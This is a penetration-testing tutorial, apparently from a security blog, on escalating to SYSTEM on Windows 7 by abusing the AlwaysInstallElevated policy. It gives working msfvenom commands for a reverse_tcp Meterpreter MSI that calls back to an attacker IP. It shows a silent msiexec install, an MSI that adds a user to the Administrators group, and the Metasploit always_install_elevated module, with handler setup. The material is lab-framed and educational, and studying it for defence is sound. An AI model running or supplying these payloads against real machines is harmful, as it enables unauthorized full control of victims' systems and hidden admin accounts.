Windows Privilege Escalation (AlwaysInstallElevated)

Hello Friends!! In this article we are demonstrating the Windows privilege escalation method via the method of AlwaysInstallElevated policy. In penetration testing, when we spawn command shell as local user, it is possible to exploit the vulnerable features (or configuration settings) of Windows Group policy, to further elevate them to admin privileges and gain the administrator access

Table of Content

• Introduction
• Lab setup
• Spawn command shell as local user
• Escalate privilege manually via .msi payload (MSfvenom)
• Escalated privilege via Adding user Administrators Group (Msfvenom)
• Escalate privilege via Post exploit (Metasploit)

Introduction

AlwaysInstallElevated Policy

As we all are aware that Windows OS comes installed with a Windows Installer engine which is used by MSI packages for the installation of applications. These MSI packages can be installed with elevated privileges for non-admin users

For this purpose the AlwaysInstallElevated policy feature is used to install a MSI package file with elevated (system) privileges. This policy if enabled in the Local Group Policy editor; directs the Windows Installer engine to use elevated permissions when it installs any program on the system. This method can make a machine vulnerable posing a high security risk, because a non-administrator user can run installations with elevated privileges and access many secure locations on the computer.

Caution Note: This option is equivalent to granting full administrative rights, which can pose a massive security risk. Microsoft strongly discourages the use of this setting. Hence this should be used for the lab purposes only (and not in Production environment)

Lab set-up

Victim’s Machine: Windows 7

Attacker’s machine: Kali Linux

To make this policy effective [i.e install a package with elevated (system) privileges], we need to ensure that victim machine is deliberately made vulnerable by enabling the AlwaysInstalledElevated Policy in the Computer Configuration and User Configuration folders of the Local Group Policy editor

1. Open the Local Group Policy editor

Type gpedit.msc in the Run dialog box of the Start Menu in the Windows 7 machine and the Local group Policy editor window prompt will open

2. Change the settings of AlwaysInstalledElevated policy

a. For the Computer configuration

Navigate to the below path in the Windows machine

Computer Configuration\Administrative Templates\Windows Components\Windows Installer

Enable the Always install with elevated privileges

b. For the User configuration

Navigate to the below path in the Windows machine

User Configuration\Administrative Templates\Windows Components\Windows Installer

Enable the Always install with elevated privileges

This completes the lab setup on the Windows machine .Now let’s proceed to our actual task.

Spawning Victim’s Machine

We need to compromise the Windows victim machine at least once to gain the meterpreter session. As you can observe that we already have victim’s metrepreter session. Let’s open the msfconsole and check the existing current sessions

msfconsole

sessions

As we can see that there exists a session already with the ID 1 . Now let’s open the session 1 and extract the user details

Meterpreter > sessions 1

Meterpreter >getuid

As we can see that we are logged into this session with the username as raj.

Note : The existing user “raj” already exists in the Windows 7 victim machine and is a non-admin user

Now let’s open the command shell of the target machine

Meterpreter >shell

Upon executing the shell command, we would land into the user’s Downloads folder C:\Users\raj\Downloads

We will now run the registry query command on this command prompt so as to verify whether the Windows installer have elevated privileges or not, as per our settings configured earlier

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

As we can see from the output that the registry named “AlwaysInstallElevated” exists with a dword (REG_WORD) value of 0x1, which means that the AlwaysInstallElevated policy is enabled.

Privilege Escalation via .msi payload (1^st Method)

Now let’s open a new terminal in Kali machine and generate a MSI Package file (1.msi ) utilizing the Windows Meterpreter payload as follows

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.120 lport=4567 –f  msi > /root/Desktop/1.msi

On the existing Meterpreter session of the user, let’s upload our MSI file named 1.msi to the target machine as follows. Once it is uploaded successfully, we will then jump to the shell

upload /root/Desktop/1.msi  .

Note: Before executing the MSI Package file, let's start a MSF handler in another terminal window

(Refer to the commands for same, after the below screenshot)

Execute the MSI package file on the Windows command prompt

msiexec /quiet /qn /i  1.msi

/quiet = Suppress any messages to the user during installation
/qn = No GUI
/i = Regular (vs. administrative) installation

In a parallel window, we opened a new handler before executing the .msi file

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.120

msf exploit(handler) > set lport 4567

msf exploit(handler) > exploit

Finally we got the meterpreter session using this exploit!!  Let’s have further look at the details of the user privileges we gained on this system

Meterpreter > getsystem

Meterpreter > getuid

Fantastic!! We have rooted to the Local System account (NT AUTHORITY\SYSTEM) which has the highest level of privileges on the local system.

Adding user in Administrators Group (2^nd Method)

In this method we will choose a non-admin user from the existing list of users in the target machine and then try to elevate his privileges. Here we will send the relevant Windows commands (to the target machine) , utilizing the windows/exec payload of the Metasploit.

First let us check the details of existing users in the victim machine. Here we can select any user , lets; select a user named “raaz” who is a non-admin user

net user

The verification that the user name “raaz” is in the Local Users group can be done by running the following in the command prompt

net user raaz

Generate a MSI package (2.msi ) with the windows/exec payload, that sends a command instructing to add local admin privileges for the user “raaz” , to the target machine.

msfvenom -p windows/exec CMD='net localgroup administrators raaz /add' -f  msi > /root/Desktop/2.msi

Now let’s upload the MSI file 2.msi to the target machine as follows

Note : Before uploading the MSI file , press Ctrl+Z to exit out of the victim machine’s command shell

In the meterpreter shell type

upload /root/Desktop/2.msi  .

Once the MSI file is uploaded successfully, we will take the command shell and execute the installer file

shell

msiexec /quiet /qn /i  2.msi

The verification that the user name “raaz” has been added into the local administrator group can be done by running the following in the command prompt

net user raaz

As we can see from the screenshot the user raaz is now member of Local Administrators group

Awesome !! We have got the privileges of the non-admin user escalated via using the manual exploit .

Privilege Escalation via Metasploit Post Exploit (3^rd Method)

In order to perform the Privilege escalation abusing the AlwaysInstalledElevated policy , we can also utilize the inbuilt exploit of the Metasploit module as follows :

Now let’s use this exploit

use exploit/windows/local/always_install_elevated

msf exploit(always_install_elevated) > set session 1

msf exploit(always_install_elevated) > exploit

We got the meterpreter session using the in-built exploit as well !! Now lets have further look at the details of the user privileges

Meterpreter > get system

Meterpreter > getuid

Hurrah!! We have rooted to the Local System account (NT AUTHORITY\SYSTEM) which has the highest level of privileges on the local system

Note : We have shown one of the methodologies to elevate the privileges .This lab can be performed in multiple ways , as there are many other methods of performing the Windows privilege escalation.